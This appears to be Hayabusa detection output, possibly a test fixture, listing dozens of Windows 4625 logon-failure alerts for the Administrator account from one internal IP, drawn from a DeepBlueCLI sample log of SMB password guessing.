+2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
